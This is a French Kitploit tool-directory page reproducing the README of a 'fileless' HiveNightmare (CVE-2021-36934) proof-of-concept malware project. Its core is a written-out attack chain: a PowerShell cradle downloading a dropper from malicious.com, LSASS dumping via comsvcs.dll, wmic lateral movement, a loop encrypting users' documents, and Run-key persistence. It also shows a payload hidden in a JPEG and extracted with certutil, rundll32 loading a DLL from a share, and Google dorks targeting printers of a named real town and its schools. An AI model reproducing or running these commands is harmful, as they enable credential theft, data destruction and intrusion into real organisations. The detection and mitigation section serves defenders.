Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Why-so-Serious-SAM — PoC malware qui utilise l'exploit CVE-2021-36934 (ACLs incorrectes sur les copies instantanées) en utilisant une méthode de red team sans fichier sur Windows 10/11 avec LOLBins, extrayant les ruches SYSTEM et SAM pour les hachages NTLM locaux. | Kitploit
Outils/GitHubGitHub/p1rat3r00t/why-so-serious-sam
Escalade de PrivilègesExploitationMouvement LatéralPost-ExploitationCTFTests d'IntrusionApprentissage et ÉducationRed TeamingLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHubp1rat3r00t/why-so-serious-sam

Why-so-Serious-SAM

PoC malware qui utilise l'exploit CVE-2021-36934 (ACLs incorrectes sur les copies instantanées) en utilisant une méthode de red team sans fichier sur Windows 10/11 avec LOLBins, extrayant les ruches SYSTEM et SAM pour les hachages NTLM locaux.

Voir le dépôtSite web
13il y a 1 anPas encore vérifié

HiveNightmare 'Fileless' Exploit PoC :

Screenshot 2025-05-21 001453


Table des matières

  • Vue d'ensemble
  • Fonctionnalités
  • Exemple de simulation en laboratoire
  • Reconnaissance avec Google Dorks
  • Présentation des LOLBins
  • Intégration du dropper sans fichier
  • Exploitation de Print Spooler et HiveNightmare
  • Injection de DLL réfléchissante
  • Cartographie MITRE ATT&CK
  • Détection et atténuation
  • Avertissement légal
  • Références et lectures complémentaires

Vue d'ensemble

CVE-2021-36934/HiveNightmare est un projet de recherche pédagogique Red/Purple Team qui simule un framework d'attaque sans fichier sous Windows 11. Il permet l'émulation de chaînes de destruction d'attaquants réels en utilisant les techniques MITRE ATT&CK, avec un accent sur les opérations furtives sans fichier.

Avertissement : Pour la recherche et la formation uniquement dans des laboratoires isolés. Ne pas utiliser sur des systèmes de production ou non autorisés.


Fonctionnalités

  • Simule des attaques de ransomware/wiperware sans fichier de bout en bout
  • Démontre l'utilisation de Living Off the Land Binaries (LOLBins)
  • Présente l'accès aux identifiants, l'élévation de privilèges, le mouvement latéral et la persistance
  • Contient des exemples pratiques de laboratoire et de reconnaissance
  • Cartographie MITRE ATT&CK pour des exercices de détection par l'équipe bleue

Exemple de simulation en laboratoire

La simulation PowerShell suivante montre une chaîne d'attaque ransomware sans fichier typique utilisant des outils Windows intégrés (LOLBins) :

root@kitploit:~
# Initial Access: Load dropper
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# Execution: Decode and load in-memory payload
$bytes = [System.Convert]::FromBase64String("[Base64Payload]") 
[System.Reflection.Assembly]:https://raw.githubusercontent.com/p1rat3r00t/why-so-serious-sam/main/:Load($bytes)

# Privilege Escalation
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# Credential Access
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# Lateral Movement
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# File Encryption Example
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
  $data = Get-Content $file.FullName -Raw
  $aes = New-Object System.Security.Cryptography.AesManaged
  $aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")
  $aes.IV = New-Object byte[] 16
  $enc = $aes.CreateEncryptor().TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
  Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}

# Persistence
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"

Reconnaissance avec Google Dorks

Objectif exemple : Identifier les services d'imprimante exposés publiquement à Moberly, Missouri, potentiellement vulnérables à des exploits comme PrintNightmare.

Exemples de requêtes Google Dork :

root@kitploit:~
inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"

Présentation des LOLBins

Living Off the Land Binaries (LOLBins) sont des binaires Windows légitimes et de confiance, souvent abusés par les adversaires pour contourner les contrôles de sécurité et exécuter du code malveillant sans fichier.

Exemple d'utilisation (attaque sur service d'impression) :

root@kitploit:~
rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry

Les attaquants utilisent des LOLBins comme rundll32.exe, regsvr32.exe et powershell.exe pour exécuter des charges utiles à partir de partages réseau, souvent après avoir identifié des imprimantes ou serveurs exposés via une reconnaissance.


Intégration du dropper sans fichier

Objectif : Distribuer des charges utiles de manière furtive en intégrant des archives dans des images et en les extrayant à l'aide d'outils natifs.

Étapes :

  1. Intégration de la charge utile :

    root@kitploit:~
    copy /b nsfw.jpg + payload.7z nsfw.jpg
    
  2. Extraction et décodage :

    root@kitploit:~
    certutil -decode nsfw.jpg dropper.7z
    7z x dropper.7z -oC:\Users\Public\
    

Cette méthode contourne le filtrage traditionnel par extension de fichier et exploite les outils intégrés pour une distribution évasive.


Injection de DLL réfléchissante

Technique : Charger et exécuter une DLL malveillante directement en mémoire à l'aide d'un chargement réfléchissant.

Exemple :

root@kitploit:~
rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry

Cela permet une exécution furtive en mémoire, sans laisser d'artefacts sur le disque.


Cartographie MITRE ATT&CK


Détection et atténuation

Détection

  • Sysmon + règles Sigma :

    • Surveiller rundll32.exe chargeant des DLL non système
    • Détecter une utilisation anormale de certutil.exe, regsvr32.exe, mshta.exe
    • Suivre l'accès aux volumes d'ombre par des non-administrateurs
  • Exemples SIEM (ELK/Splunk) :

    • Alertes sur l'exécution depuis des partages publics
    • Anomalies dans les relations parent/enfant (ex. explorer.exe générant rundll32.exe)
    • Commandes encodées suspectes dans PowerShell ou CMD

Atténuation

  • Désactiver le spouleur d'impression là où il n'est pas nécessaire :
    root@kitploit:~
    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled
    
  • Appliquer tous les correctifs de sécurité et durcir les ACL
  • Bloquer ou restreindre les LOLBins avec AppLocker ou WDAC
  • Utiliser des solutions EDR qui détectent le chargement réfléchissant de DLL et les attaques en mémoire

Avertissement légal

Tout le contenu, le code et les techniques de ce dépôt sont destinés uniquement à un usage éducatif et à des tests d'intrusion autorisés. N'utilisez aucune partie de ce projet en dehors d'environnements contrôlés et isolés, et sans autorisation explicite. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive.


Références et lectures complémentaires

  • LOLOL Farm – Terrain de jeu LOLBin
  • LOLGEN – Générer des chaînes LOLBin
  • Détection de SeriousSam
  • Introduction à l'injection de DLL
  • Chaîne d'exploitation du spouleur d'impression
  • Malware sans fichier – Wikipédia
  • PrintSpoofer (original)
  • HiveNightmare
  • Mitre Attck T1055
  • Démo de HiveNightmare

Restez prudent, faites vos recherches de manière responsable, et utilisez toujours dans un cadre légal et éthique.

Télécharger l’outil
PhaseTechniqueIDDescription
Accès initialValid Accounts / Drive-by CompromiseT1078, T1189Compromission d'interfaces d'impression publiques
ExécutionDLL Side-Loading / LOLBinsT1218, T1055.001Exécution de DLL en mode réfléchissant via des binaires de confiance
Élévation de privilègesPrint Spooler Exploits / Hive ACL AbuseT1068, T1003.002Accès SYSTEM et extraction de hachages SAM
Contournement de défenseExecution sans fichier / Fichiers obfusquésT1027, T1202Charges utiles encodées distribuées via certutil, mshta, etc.
Accès aux identifiantsLSASS Dumping / SAM Hive AccessT1003Vidage d'identifiants après HiveNightmare
Mouvement latéralSMB/Net Share EnumerationT1021.002Propagation via les partages d'imprimante ou l'énumération du spouleur
ImpactData Destruction / EncryptionT1485, T1486Wiperware sans fichier déclenché via des charges utiles DLL